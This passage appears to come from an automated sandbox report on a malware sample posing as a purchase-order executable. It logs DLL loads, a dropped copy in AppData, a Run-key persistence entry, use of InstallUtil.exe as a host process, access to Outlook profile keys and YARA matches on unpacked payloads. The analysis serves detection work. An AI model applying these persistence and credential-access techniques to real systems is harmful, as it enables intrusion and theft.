                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeStatic file information: File size 2945024 > 1048576
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2ce600
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1730290964.0000000002AB3000.00000004.00000800.00020000.00000000.sdmp, PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1748768765.0000000005D00000.00000004.08000000.00040000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000003F45000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1856237995.0000000003436000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000003EA6000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000005.00000002.1936842085.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000005.00000002.1966327299.0000000003CB8000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1730290964.0000000002AB3000.00000004.00000800.00020000.00000000.sdmp, PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1748768765.0000000005D00000.00000004.08000000.00040000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000003F45000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1856237995.0000000003436000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000003EA6000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000005.00000002.1936842085.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000005.00000002.1966327299.0000000003CB8000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1748243169.0000000005AD0000.00000004.08000000.00040000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000004341000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1748243169.0000000005AD0000.00000004.08000000.00040000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000004341000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Source: Yara matchFile source: 5.2.Avycqjqvmh.exe.3f9ba40.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.5a60000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.Avycqjqvmh.exe.428ba40.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.Avycqjqvmh.exe.413c600.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.1966327299.0000000003F9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1748074888.0000000005A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1856237995.0000000002EC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.1936842085.0000000002BD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1730290964.0000000002798000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe PID: 7096, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Avycqjqvmh.exe PID: 2472, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Avycqjqvmh.exe PID: 928, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_00D4A123 push esp; iretd 0_2_00D4A126
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_059709D3 push E40577B0h; iretd 0_2_059709ED
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_0597091C pushfd ; iretd 0_2_0597091D
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_05972EA7 push esp; retf 0_2_05972EA8
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_05970854 push esp; iretd 0_2_05970855
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_05B5B908 push eax; retf 0_2_05B5B911
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_05B53229 push ds; iretd 0_2_05B5322C
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_05BB367A push ebp; retf 0_2_05BB3681
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 0_2_05E30E87 push E8000001h; retf 0_2_05E30E91
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_012BA123 push esp; iretd 2_2_012BA126
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_06190854 push esp; iretd 2_2_06190855
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_0619091C pushfd ; iretd 2_2_0619091D
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_06190D13 push eax; iretd 2_2_06190D1D
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_06207E93 push es; iretd 2_2_06207ED0
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_06363200 push es; ret 2_2_0636323C
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_06373229 push ds; iretd 2_2_0637322C
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_063761B9 push es; ret 2_2_063761DC
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_06378F1F push es; ret 2_2_06378F24
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_0637B908 push eax; retf 2_2_0637B911
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_063D367A push ebp; retf 2_2_063D3681
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_0658302D push es; retf 2_2_06583038
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 2_2_06650E87 push E8000001h; retf 2_2_06650E91
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_0117A123 push esp; iretd 5_2_0117A126
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_05F40733 pushfd ; iretd 5_2_05F4091D
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_05F40738 pushfd ; iretd 5_2_05F4091D
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_05F42EA7 push esp; retf 5_2_05F42EA8
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_06123229 push ds; iretd 5_2_0612322C
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_06128F1F push es; ret 5_2_06128F24
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_0612B908 push eax; retf 5_2_0612B911
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_0618367A push ebp; retf 5_2_06183681
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_06180007 push es; ret 5_2_0618001C
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeFile created: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeJump to dropped file
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AvycqjqvmhJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AvycqjqvmhJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
